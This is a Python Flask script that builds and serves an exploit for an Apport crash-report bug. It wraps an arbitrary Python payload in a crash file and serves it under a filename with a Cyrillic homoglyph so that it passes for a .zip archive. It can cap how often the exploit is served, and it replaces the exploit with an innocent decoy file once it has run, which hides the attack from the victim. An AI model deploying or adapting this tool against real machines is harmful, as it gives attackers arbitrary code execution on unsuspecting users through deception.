#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
This Flask application will build and serve a file that exploits
the Apport CrashDB bug. The exploit is created based on the
`crash-report.tmpl` and `payload.py` files.

The default Python payload will run an arbitrary command and then override
the exploit file with a innocent decoy file. The entire process looks
like a regular .zip file being by file-roller.
"""

import argparse
import base64

from flask import Flask, abort, render_template, make_response
from jinja2 import Template

app = Flask(__name__, template_folder='.')

@app.route("/")
def index():
    """
    Serve the index page
    """
    return render_template("index.tmpl", payload_name=app.config["payload_name"])


@app.route("/<file_name>")
def payload(file_name):
    """
    Serve the exploit crash file.
    """
    if file_name == app.config["payload_name"]:
        # Only serve the exploit a maximum of 'hits' times.
        if app.config["hits"] is 0:
            response = make_response(app.config["decoy"])
        else:
            response = make_response(app.config["exploit"])
            if app.config["hits"] and app.config["hits"] > 0:
                app.config["hits"] -= 1

        response.headers["Content-Type"] = "application/octet-stream"
        response.headers["Content-Disposition"] = b"attachment; filename=" + file_name.encode('utf-8')
        return response
    else:
        abort(404)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Serve the UBoomBoom Apport crash report exploit.")
    parser.add_argument("-c", "--crash-template", metavar="CRASH_REPORT_TEMPLATE",
                        help="Template containing the crash report (default '%(default)s').",
                        default="crash-report.tmpl", type=argparse.FileType('r'))

    parser.add_argument("-p", "--payload", metavar="PAYLOAD", type=argparse.FileType('r'),
                        help="Python code for the payload (default '%(default)s').",
                        default="payload.py")

    parser.add_argument("-d", "--decoy", metavar="DECOY", type=argparse.FileType('rb'),
                        help="Decoy file to replace the exploit when successful "
                        "(default '%(default)s').",
                        default="decoy.zip")

    parser.add_argument("-n", "--payload-name", metavar="EXPLOIT_FILENAME", type=str,
                        help="The name of the exploit file when served to the user "
                        "(default: '%(default)s') containing a p homoglyph.",
                        default=u"apport-exploit.zi\u0440".encode("utf-8"))

    parser.add_argument("--hits", type=int, default=None,
                         help="The number of times to serve the exploit (default: unlimited).")

    parser.add_argument("--port", type=int, default=8000,
                        help="Port for server to listen on (default '%(default)s')."),

    args = parser.parse_args()

    # Newlines are needed at the start and end to create a valid crash report format.
    python_payload = args.payload.read().strip()

    decoy_data = args.decoy.read()
    decoy_base64 = base64.encodestring(decoy_data).decode("utf-8")

    # Format the payload and create the exploit crash file from the template.
    crash_template = Template(args.crash_template.read())
    crash_exploit = crash_template.render(python_payload=python_payload,
                                          decoy_data=decoy_base64)

    try:
        # Try convert byte string to unicode for Python 2
        args.payload_name = args.payload_name.decode("utf-8")
    except AttributeError:
        pass

    app.config["exploit"] = crash_exploit
    app.config["decoy"] = decoy_data
    app.config["payload_name"] = args.payload_name
    app.config["hits"] = args.hits

    app.run(host="0.0.0.0", port=args.port, debug=True)
